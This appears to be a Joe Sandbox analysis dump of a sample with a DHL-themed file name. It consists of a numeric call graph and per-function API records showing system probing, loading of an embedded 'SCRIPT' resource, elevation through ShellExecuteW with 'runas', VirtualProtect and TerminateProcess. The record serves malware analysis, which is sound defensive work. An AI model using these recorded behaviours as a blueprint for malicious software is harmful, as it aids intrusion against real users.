SetFilePointerEx 98560->98575 98562 7406e 98562->98558 98563->98520 98564->98522 98565->98488 98566->98506 98567->98518 98568->98518 98569->98526 98570->98529 98571->98539 98572->98539 98573->98545 98574->98540 98575->98562 98576->98345 98577->98363 98578->98374 98579->98389 98580->98383 98581->98388 98582->98393 98583->98398 98585 36270 22 API calls 98584->98585 98605 39eb5 98585->98605 98586 39fd2 98587 3a4a1 22 API calls 98586->98587 98588 39fec 98587->98588 98588->98404 98591 7f7c4 98618 996e2 84 API calls __wsopen_s 98591->98618 98592 7f699 98599 4fddb 22 API calls 98592->98599 98593 3a405 98593->98588 98619 996e2 84 API calls __wsopen_s 98593->98619 98597 3a6c3 22 API calls 98597->98605 98598 7f7d2 98600 3a4a1 22 API calls 98598->98600 98601 7f754 98599->98601 98602 7f7e8 98600->98602 98603 4fe0b 22 API calls 98601->98603 98602->98588 98607 3a12c __fread_nolock 98603->98607 98605->98586 98605->98591 98605->98592 98605->98593 98605->98597 98606 3a587 22 API calls 98605->98606 98605->98607 98608 3a4a1 22 API calls 98605->98608 98609 3aec9 22 API calls 98605->98609 98613 34573 41 API calls _wcslen 98605->98613 98615 348c8 23 API calls 98605->98615 98616 349bd 22 API calls __fread_nolock 98605->98616 98617 3a673 22 API calls 98605->98617 98606->98605 98607->98591 98607->98593 98608->98605 98610 3a0db CharUpperBuffW 98609->98610 98614 3a673 22 API calls 98610->98614 98612->98408 98613->98605 98614->98605 98615->98605 98616->98605 98617->98605 98618->98598 98619->98588 98621 37510 53 API calls 98620->98621 98622 b7f90 98621->98622 98646 b7fd5 ISource 98622->98646 98658 b8cd3 98622->98658 98624 b8281 98625 b844f 98624->98625 98630 b828f 98624->98630 98699 b8ee4 60 API calls 98625->98699 98628 b845e 98629 b846a 98628->98629 98628->98630 98629->98646 98671 b7e86 98630->98671 98631 37510 53 API calls 98647 b8049 98631->98647 98636 b82c8 98686 4fc70 98636->98686 98639 b82e8 98692 a359c 82 API calls __wsopen_s 98639->98692 98640 b8302 98693 363eb 22 API calls 98640->98693 98643 b82f3 GetCurrentProcess TerminateProcess 98643->98640 98644 b8311 98694 36a50 22 API calls 98644->98694 98646->98415 98647->98624 98647->98631 98647->98646 98647->98647 98690 9417d 22 API calls __fread_nolock 98647->98690 98691 b851d 42 API calls _strftime 98647->98691 98648 b832a 98657 b8352 98648->98657 98695 404f0 22 API calls 98648->98695 98650 b84c5 98650->98646 98653 b84d9 FreeLibrary 98650->98653 98651 b8341 98696 b8b7b 75 API calls 98651->98696 98653->98646 98657->98650 98697 404f0 22 API calls 98657->98697 98698 3aceb 23 API calls ISource 98657->98698 98700 b8b7b 75 API calls 98657->98700 98659 3aec9 22 API calls 98658->98659 98660 b8cee CharLowerBuffW 98659->98660 98701 98e54 98660->98701 98664 3a961 22 API calls 98665 b8d2a 98664->98665 98708 36d25 22 API calls __fread_nolock 98665->98708 98667 b8d3e 98668 393b2 22 API calls 98667->98668 98670 b8d48 _wcslen 98668->98670 98669 b8e5e _wcslen 98669->98647 98670->98669 98709 b851d 42 API calls _strftime 98670->98709 98672 b7ea1 98671->98672 98676 b7eec 98671->98676 98673 4fe0b 22 API calls 98672->98673 98674 b7ec3 98673->98674 98675 4fddb 22 API calls 98674->98675 98674->98676 98675->98674 98677 b9096 98676->98677 98678 b92ab ISource 98677->98678 98685 b90ba _strcat _wcslen 98677->98685 98678->98636 98679 3b567 39 API calls 98679->98685 98680 3b6b5 39 API calls 98680->98685 98681 3b38f 39 API calls 98681->98685 98682 37510 53 API calls 98682->98685 98683 5ea0c 21 API calls ___std_exception_copy 98683->98685 98685->98678 98685->98679 98685->98680 98685->98681 98685->98682 98685->98683 98712 9efae 24 API calls _wcslen 98685->98712 98687 4fc85 98686->98687 98688 4fd1d VirtualProtect 98687->98688 98689 4fceb 98687->98689 98688->98689 98689->98639 98689->98640 98690->98647 98691->98647 98692->98643 98693->98644 98694->98648 98695->98651 98696->98657 98697->98657 98698->98657 98699->98628 98700->98657 98702 98e74 _wcslen 98701->98702 98703 98f63 98702->98703 98705 98ea9 98702->98705 98707 98f68 98702->98707 98703->98664 98703->98670 98705->98703 98710 4ce60 41 API calls 98705->98710 98707->98703 98711 4ce60 41 API calls 98707->98711 98708->98667 98709->98669 98710->98705 98711->98707 98712->98685 98714 b56f2 98713->98714 98715 b56a4 98713->98715 98714->98427 98716 4fe0b 22 API calls 98715->98716 98718 b56c6 98716->98718 98717 4fddb 22 API calls 98717->98718 98718->98714 98718->98717 98731 a0a59 22 API calls 98718->98731 98721 a0b13 98720->98721 98722 a0ada 98720->98722 98721->98453 98722->98721 98723 4fddb 22 API calls 98722->98723 98723->98721 98724->98454 98725->98437 98726->98442 98727->98454 98728->98455 98729->98459 98730->98454 98731->98718 98732 83a41 98736 a10c0 98732->98736 98734 83a4c 98735 a10c0 53 API calls 98734->98735 98735->98734 98737 a10fa 98736->98737 98742 a10cd 98736->98742 98737->98734 98738 a10fc 98748 4fa11 53 API calls 98738->98748 98739 a1101 98741 37510 53 API calls 98739->98741 98743 a1108 98741->98743 98742->98737 98742->98738 98742->98739 98745 a10f4 98742->98745 98744 36350 22 API calls 98743->98744 98744->98737 98747 3b270 39 API calls 98745->98747 98747->98737 98748->98739 98749 31cad SystemParametersInfoW 98750 31033 98755 34c91 98750->98755 98754 31042 98756 3a961 22 API calls 98755->98756 98757 34cff 98756->98757 98763 33af0 98757->98763 98759 34d9c 98761 31038 98759->98761 98766 351f7 22 API calls __fread_nolock 98759->98766 98762 500a3 29 API calls __onexit 98761->98762 98762->98754 98767 33b1c 98763->98767 98766->98759 98768 33b0f 98767->98768 98769 33b29 98767->98769 98768->98759 98769->98768 98770 33b30 RegOpenKeyExW 98769->98770 98770->98768 98771 33b4a RegQueryValueExW 98770->98771 98772 33b80 RegCloseKey 98771->98772 98773 33b6b 98771->98773 98772->98768 98773->98772 98774 32e37 98775 3a961 22 API calls 98774->98775 98776 32e4d 98775->98776 98853 34ae3 98776->98853 98778 32e6b 98779 33a5a 24 API calls 98778->98779 98780 32e7f 98779->98780 98781 39cb3 22 API calls 98780->98781 98782 32e8c 98781->98782 98783 34ecb 94 API calls 98782->98783 98784 32ea5 98783->98784 98785 72cb0 98784->98785 98786 32ead 98784->98786 98787 a2cf9 80 API calls 98785->98787 98867 3a8c7 22 API calls __fread_nolock 98786->98867 98788 72cc3 98787->98788 98789 72ccf 98788->98789 98791 34f39 68 API calls 98788->98791 98794 34f39 68 API calls 98789->98794 98791->98789 98792 32ec3 98868 36f88 22 API calls 98792->98868 98796 72ce5 98794->98796 98795 32ecf 98797 39cb3 22 API calls 98795->98797 98885 33084 22 API calls 98796->98885 98798 32edc 98797->98798 98869 3a81b 41 API calls 98798->98869 98800 32eec 98803 39cb3 22 API calls 98800->98803 98802 72d02 98886 33084 22 API calls 98802->98886 98805 32f12 98803->98805 98870 3a81b 41 API calls 98805->98870 98806 72d1e 98808 33a5a 24 API calls 98806->98808 98809 72d44 98808->98809 98887 33084 22 API calls 98809->98887 98810 32f21 98813 3a961 22 API calls 98810->98813 98812 72d50 98888 3a8c7 22 API calls __fread_nolock 98812->98888 98815 32f3f 98813->98815 98871 33084 22 API calls 98815->98871 98816 72d5e 98889 33084 22 API calls 98816->98889 98818 32f4b 98872 54a28 40 API calls 3 library calls 98818->98872 98821 72d6d 98890 3a8c7 22 API calls __fread_nolock 98821->98890 98822 32f59 98822->98796 98823 32f63 98822->98823 98873 54a28 40 API calls 3 library calls 98823->98873 98826 72d83 98891 33084 22 API calls 98826->98891 98827 32f6e 98827->98802 98829 32f78 98827->98829 98874 54a28 40 API calls 3 library calls 98829->98874 98830 72d90 98832 32f83 98832->98806 98833 32f8d 98832->98833 98875 54a28 40 API calls 3 library calls 98833->98875 98835 32f98 98836 32fdc 98835->98836 98876 33084 22 API calls 98835->98876 98836->98821 98837 32fe8 98836->98837 98837->98830 98879 363eb 22 API calls 98837->98879 98839 32fbf 98877 3a8c7 22 API calls __fread_nolock 98839->98877 98842 32ff8 98880 36a50 22 API calls 98842->98880 98843 32fcd 98878 33084 22 API calls 98843->98878 98846 33006 98881 370b0 23 API calls 98846->98881 98850 33021 98851 33065 98850->98851 98882 36f88 22 API calls 98850->98882 98883 370b0 23 API calls 98850->98883 98884 33084 22 API calls 98850->98884 98854 34af0 __wsopen_s 98853->98854 98855 36b57 22 API calls 98854->98855 98856 34b22 98854->98856 98855->98856 98859 34b58 98856->98859 98892 34c6d 98856->98892 98858 34c29 98860 39cb3 22 API calls 98858->98860 98863 34c5e 98858->98863 98859->98858 98861 39cb3 22 API calls 98859->98861 98864 34c6d 22 API calls 98859->98864 98866 3515f 22 API calls 98859->98866 98862 34c52 98860->98862 98861->98859 98865 3515f 22 API calls 98862->98865 98863->98778 98864->98859 98865->98863 98866->98859 98867->98792 98868->98795 98869->98800 98870->98810 98871->98818 98872->98822 98873->98827 98874->98832 98875->98835 98876->98839 98877->98843 98878->98836 98879->98842 98880->98846 98881->98850 98882->98850 98883->98850 98884->98850 98885->98802 98886->98806 98887->98812 98888->98816 98889->98821 98890->98826 98891->98830 98893 3aec9 22 API calls 98892->98893 98894 34c78 98893->98894 98894->98856 98895 33156 98898 33170 98895->98898 98899 33187 98898->98899 98900 331eb 98899->98900 98901 3318c 98899->98901 98938 331e9 98899->98938 98903 331f1 98900->98903 98904 72dfb 98900->98904 98905 33265 PostQuitMessage 98901->98905 98906 33199 98901->98906 98902 331d0 DefWindowProcW 98940 3316a 98902->98940 98907 331f8 98903->98907 98908 3321d SetTimer RegisterWindowMessageW 98903->98908 98947 318e2 10 API calls 98904->98947 98905->98940 98910 331a4 98906->98910 98911 72e7c 98906->98911 98912 33201 KillTimer 98907->98912 98913 72d9c 98907->98913 98915 33246 CreatePopupMenu 98908->98915 98908->98940 98916 331ae 98910->98916 98917 72e68 98910->98917 98952 9bf30 34 API calls ___scrt_fastfail 98911->98952 98943 330f2 Shell_NotifyIconW ___scrt_fastfail 98912->98943 98919 72dd7 MoveWindow 98913->98919 98920 72da1 98913->98920 98914 72e1c 98948 4e499 42 API calls 98914->98948 98915->98940 98924 72e4d 98916->98924 98925 331b9 98916->98925 98951 9c161 27 API calls ___scrt_fastfail 98917->98951 98919->98940 98927 72da7 98920->98927 98928 72dc6 SetFocus 98920->98928 98924->98902 98950 90ad7 22 API calls 98924->98950 98931 331c4 98925->98931 98932 33253 98925->98932 98926 72e8e 98926->98902 98926->98940 98927->98931 98933 72db0 98927->98933 98928->98940 98929 33214 98944 33c50 DeleteObject DestroyWindow 98929->98944 98930 33263 98930->98940 98931->98902 98949 330f2 Shell_NotifyIconW ___scrt_fastfail 98931->98949 98945 3326f 44 API calls ___scrt_fastfail 98932->98945 98946 318e2 10 API calls 98933->98946 98938->98902 98941 72e41 98942 33837 49 API calls 98941->98942 98942->98938 98943->98929 98944->98940 98945->98930 98946->98940 98947->98914 98948->98931 98949->98941 98950->98938 98951->98930 98952->98926 98953 3105b 98958 3344d 98953->98958 98955 3106a 98989 500a3 29 API calls __onexit 98955->98989 98957 31074 98959 3345d __wsopen_s 98958->98959 98960 3a961 22 API calls 98959->98960 98961 33513 98960->98961 98962 33a5a 24 API calls 98961->98962 98963 3351c 98962->98963 98990 33357 98963->98990 98966 333c6 22 API calls 98967 33535 98966->98967 98968 3515f 22 API calls 98967->98968 98969 33544 98968->98969 98970 3a961 22 API calls 98969->98970 98971 3354d 98970->98971 98972 3a6c3 22 API calls 98971->98972 98973 33556 RegOpenKeyExW 98972->98973 98974 73176 RegQueryValueExW 98973->98974 98978 33578 98973->98978 98975 73193 98974->98975 98976 7320c RegCloseKey 98974->98976 98977 4fe0b 22 API calls 98975->98977 98976->98978 98988 7321e _wcslen 98976->98988 98979 731ac 98977->98979 98978->98955 98981 35722 22 API calls 98979->98981 98980 34c6d 22 API calls 98980->98988 98982 731b7 RegQueryValueExW 98981->98982 98983 731d4 98982->98983 98985 731ee ISource 98982->98985 98984 36b57 22 API calls 98983->98984 98984->98985 98985->98976 98986 39cb3 22 API calls 98986->98988 98987 3515f 22 API calls 98987->98988 98988->98978 98988->98980 98988->98986 98988->98987 98989->98957 98991 71f50 __wsopen_s 98990->98991 98992 33364 GetFullPathNameW 98991->98992 98993 33386 98992->98993 98994 36b57 22 API calls 98993->98994 98995 333a4 98994->98995 98995->98966 98996 31098 99001 342de 98996->99001 99000 310a7 99002 3a961 22 API calls 99001->99002 99003 342f5 GetVersionExW 99002->99003 99004 36b57 22 API calls 99003->99004 99005 34342 99004->99005 99006 393b2 22 API calls 99005->99006 99015 34378 99005->99015 99007 3436c 99006->99007 99009 337a0 22 API calls 99007->99009 99008 3441b GetCurrentProcess IsWow64Process 99010 34437 99008->99010 99009->99015 99011 73824 GetSystemInfo 99010->99011 99012 3444f LoadLibraryA 99010->99012 99013 34460 GetProcAddress 99012->99013 99014 3449c GetSystemInfo 99012->99014 99013->99014 99017 34470 GetNativeSystemInfo 99013->99017 99018 34476 99014->99018 99015->99008 99016 737df 99015->99016 99017->99018 99019 3109d 99018->99019 99020 3447a FreeLibrary 99018->99020 99021 500a3 29 API calls __onexit 99019->99021 99020->99019 99021->99000 99022 3f7bf 99023 3f7d3 99022->99023 99024 3fcb6 99022->99024 99026 3fcc2 99023->99026 99027 4fddb 22 API calls 99023->99027 99059 3aceb 23 API calls ISource 99024->99059 99060 3aceb 23 API calls ISource 99026->99060 99029 3f7e5 99027->99029 99029->99026 99030 3fd3d 99029->99030 99031 3f83e 99029->99031 99061 a1155 22 API calls 99030->99061 99033 41310 207 API calls 99031->99033 99048 3ed9d ISource 99031->99048 99054 3ec76 ISource 99033->99054 99034 4fddb 22 API calls 99034->99054 99036 3fef7 99036->99048 99063 3a8c7 22 API calls __fread_nolock 99036->99063 99038 84600 99038->99048 99062 3a8c7 22 API calls __fread_nolock 99038->99062 99039 84b0b 99065 a359c 82 API calls __wsopen_s 99039->99065 99045 3a8c7 22 API calls 99045->99054 99046 3fbe3 99046->99048 99049 84bdc 99046->99049 99056 3f3ae ISource 99046->99056 99047 3a961 22 API calls 99047->99054 99066 a359c 82 API calls __wsopen_s 99049->99066 99050 500a3 29 API calls pre_c_initialization 99050->99054 99052 50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99052->99054 99053 84beb 99067 a359c 82 API calls __wsopen_s 99053->99067 99054->99034 99054->99036 99054->99038 99054->99039 99054->99045 99054->99046 99054->99047 99054->99048 99054->99050 99054->99052 99054->99053 99055 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 99054->99055 99054->99056 99057 401e0 207 API calls 2 library calls 99054->99057 99058 406a0 41 API calls ISource 99054->99058 99055->99054 99056->99048 99064 a359c 82 API calls __wsopen_s 99056->99064 99057->99054 99058->99054 99059->99026 99060->99030 99061->99048 99062->99048 99063->99048 99064->99048 99065->99048 99066->99053 99067->99048 99068 503fb 99069 50407 ___scrt_is_nonwritable_in_current_image 99068->99069 99097 4feb1 99069->99097 99071 5040e 99072 50561 99071->99072 99075 50438 99071->99075 99124 5083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 99072->99124 99074 50568 99125 54e52 28 API calls _abort 99074->99125 99077 50477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 99075->99077 99108 6247d 99075->99108 99085 504d8 99077->99085 99120 54e1a 38 API calls 2 library calls 99077->99120 99078 5056e 99126 54e04 28 API calls _abort 99078->99126 99081 50576 99083 50457 99116 50959 99085->99116 99088 504de 99089 504f3 99088->99089 99121 50992 GetModuleHandleW 99089->99121 99091 504fa 99091->99074 99092 504fe 99091->99092 99093 50507 99092->99093 99122 54df5 28 API calls _abort 99092->99122 99123 50040 13 API calls 2 library calls 99093->99123 99096 5050f 99096->99083 99098 4feba 99097->99098 99127 50698 IsProcessorFeaturePresent 99098->99127 99100 4fec6 99128 52c94 10 API calls 3 library calls 99100->99128 99102 4fecb 99103 4fecf 99102->99103 99129 62317 99102->99129 99103->99071 99106 4fee6 99106->99071 99110 62494 99108->99110 99109 50a8c CatchGuardHandler 5 API calls 99111 50451 99109->99111 99110->99109 99111->99083 99112 62421 99111->99112 99113 62450 99112->99113 99114 50a8c CatchGuardHandler 5 API calls 99113->99114 99115 62479 99114->99115 99115->99077 99180 52340 99116->99180 99119 5097f 99119->99088 99120->99085 99121->99091 99122->99093 99123->99096 99124->99074 99125->99078 99126->99081 99127->99100 99128->99102 99133 6d1f6 99129->99133 99132 52cbd 8 API calls 3 library calls 99132->99103 99134 6d213 99133->99134 99137 6d20f 99133->99137 99134->99137 99139 64bfb 99134->99139 99136 4fed8 99136->99106 99136->99132 99151 50a8c 99137->99151 99140 64c07 ___scrt_is_nonwritable_in_current_image 99139->99140 99158 62f5e EnterCriticalSection 99140->99158 99142 64c0e 99159 650af 99142->99159 99144 64c1d 99149 64c2c 99144->99149 99172 64a8f 29 API calls 99144->99172 99147 64c27 99173 64b45 GetStdHandle GetFileType 99147->99173 99174 64c48 LeaveCriticalSection _abort 99149->99174 99150 64c3d __wsopen_s 99150->99134 99152 50a95 99151->99152 99153 50a97 IsProcessorFeaturePresent 99151->99153 99152->99136 99155 50c5d 99153->99155 99179 50c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99155->99179 99157 50d40 99157->99136 99158->99142 99160 650bb ___scrt_is_nonwritable_in_current_image 99159->99160 99161 650df 99160->99161 99162 650c8 99160->99162 99175 62f5e EnterCriticalSection 99161->99175 99176 5f2d9 20 API calls _abort 99162->99176 99165 650cd 99177 627ec 26 API calls __wsopen_s 99165->99177 99167 65117 99178 6513e LeaveCriticalSection _abort 99167->99178 99168 650d7 __wsopen_s 99168->99144 99169 650eb 99169->99167 99171 65000 __wsopen_s 21 API calls 99169->99171 99171->99169 99172->99147 99173->99149 99174->99150 99175->99169 99176->99165 99177->99168 99178->99168 99179->99157 99181 5096c GetStartupInfoW 99180->99181 99181->99119

                                                                                      Executed Functions

                                                                                      Function 000342DE Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 235libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 342de-3434d call 3a961 GetVersionExW call 36b57 5 73617-7362a 0->5 6 34353 0->6 7 7362b-7362f 5->7 8 34355-34357 6->8 9 73632-7363e 7->9 10 73631 7->10 11 73656 8->11 12 3435d-343bc call 393b2 call 337a0 8->12 9->7 13 73640-73642 9->13 10->9 16 7365d-73660 11->16 29 343c2-343c4 12->29 30 737df-737e6 12->30 13->8 15 73648-7364f 13->15 15->5 18 73651 15->18 19 73666-736a8 16->19 20 3441b-34435 GetCurrentProcess IsWow64Process 16->20 18->11 19->20 24 736ae-736b1 19->24 22 34437 20->22 23 34494-3449a 20->23 26 3443d-34449 22->26 23->26 27 736b3-736bd 24->27 28 736db-736e5 24->28 35 73824-73828 GetSystemInfo 26->35 36 3444f-3445e LoadLibraryA 26->36 37 736bf-736c5 27->37 38 736ca-736d6 27->38 31 736e7-736f3 28->31 32 736f8-73702 28->32 29->16 39 343ca-343dd 29->39 33 73806-73809 30->33 34 737e8 30->34 31->20 43 73715-73721 32->43 44 73704-73710 32->44 45 737f4-737fc 33->45 46 7380b-7381a 33->46 42 737ee 34->42 47 34460-3446e GetProcAddress 36->47 48 3449c-344a6 GetSystemInfo 36->48 37->20 38->20 40 343e3-343e5 39->40 41 73726-7372f 39->41 49 343eb-343ee 40->49 50 7374d-73762 40->50 51 73731-73737 41->51 52 7373c-73748 41->52 42->45 43->20 44->20 45->33 46->42 53 7381c-73822 46->53 47->48 54 34470-34474 GetNativeSystemInfo 47->54 55 34476-34478 48->55 56 73791-73794 49->56 57 343f4-3440f 49->57 58 73764-7376a 50->58 59 7376f-7377b 50->59 51->20 52->20 53->45 54->55 60 34481-34493 55->60 61 3447a-3447b FreeLibrary 55->61 56->20 64 7379a-737c1 56->64 62 34415 57->62 63 73780-7378c 57->63 58->20 59->20 61->60 62->20 63->20 65 737c3-737c9 64->65 66 737ce-737da 64->66 65->20 66->20
                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 0003430D
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      • GetCurrentProcess.KERNEL32(?,000CCB64,00000000,?,?), ref: 00034422
                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00034429
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00034454
                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00034466
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00034474
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0003447B
                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 000344A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                      • String ID: GetNativeSystemInfo$X$kernel32.dll$|O
                                                                                      • API String ID: 3290436268-386561903
                                                                                      • Opcode ID: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
                                                                                      • Instruction ID: 562c7bc3c51465ea5e242cbcf6fe9f8274ff7d4cb6b846dae06d5a91df09f111
                                                                                      • Opcode Fuzzy Hash: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
                                                                                      • Instruction Fuzzy Hash: 3FA1E962D0A2C4FFD726C76A7C815997FD87B26320F0884A8D0C59FE22D2BC45C4DB25
                                                                                      Function 000342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 596 342a2-342ba CreateStreamOnHGlobal 597 342da-342dd 596->597 598 342bc-342d3 FindResourceExW 596->598 599 342d9 598->599 600 735ba-735c9 LoadResource 598->600 599->597 600->599 601 735cf-735dd SizeofResource 600->601 601->599 602 735e3-735ee LockResource 601->602 602->599 603 735f4-735fc 602->603 604 73600-73612 603->604 604->599
                                                                                      APIs
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000350AA,?,?,00000000,00000000), ref: 000342B2
                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000350AA,?,?,00000000,00000000), ref: 000342C9
                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735BE
                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735D3
                                                                                      • LockResource.KERNEL32(000350AA,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20,?), ref: 000735E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                      • String ID: SCRIPT
                                                                                      • API String ID: 3051347437-3967369404
                                                                                      • Opcode ID: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
                                                                                      • Instruction ID: 625e3f2b414380327432585323face6991277067d6ea4099553cec483d9908a7
                                                                                      • Opcode Fuzzy Hash: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
                                                                                      • Instruction Fuzzy Hash: 91117C70600700BFF7228BA6DC48F277BBDEBC6B51F148169F4169A660DB75EC008A20
                                                                                      Function 00072BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
                                                                                        • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,000F2224), ref: 00072C10
                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,000F2224), ref: 00072C17
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                      • String ID: runas
                                                                                      • API String ID: 448630720-4000483414
                                                                                      • Opcode ID: 26c01338eb2569a36d62f2d8f12bd5b2d2956f6db443ab2f3d82e1b735e58f57
                                                                                      • Instruction ID: b3612dd68635b20a09b0c30cb29662cfe6234770ce8e18ef3c68b44ee27ee3ab
                                                                                      • Opcode Fuzzy Hash: 26c01338eb2569a36d62f2d8f12bd5b2d2956f6db443ab2f3d82e1b735e58f57
                                                                                      • Instruction Fuzzy Hash: 4011D331608345AAD71AFF60DC92DFEB7AC9B91300F44542DF286520A3CFA58A49D712
                                                                                      Function 0003D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 0003D807
                                                                                      • timeGetTime.WINMM ref: 0003DA07
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB28
                                                                                      • TranslateMessage.USER32(?), ref: 0003DB7B
                                                                                      • DispatchMessageW.USER32(?), ref: 0003DB89
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB9F
                                                                                      • Sleep.KERNEL32(0000000A), ref: 0003DBB1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                      • String ID:
                                                                                      • API String ID: 2189390790-0
                                                                                      • Opcode ID: 1a01eaea2a8f9afe73e040889512171c357e196380b38e78b3079677997631ba
                                                                                      • Instruction ID: a6669a72be199b162cb4cd41d4cbafad4c8465486da3ff5d9a48b93596a99999
                                                                                      • Opcode Fuzzy Hash: 1a01eaea2a8f9afe73e040889512171c357e196380b38e78b3079677997631ba
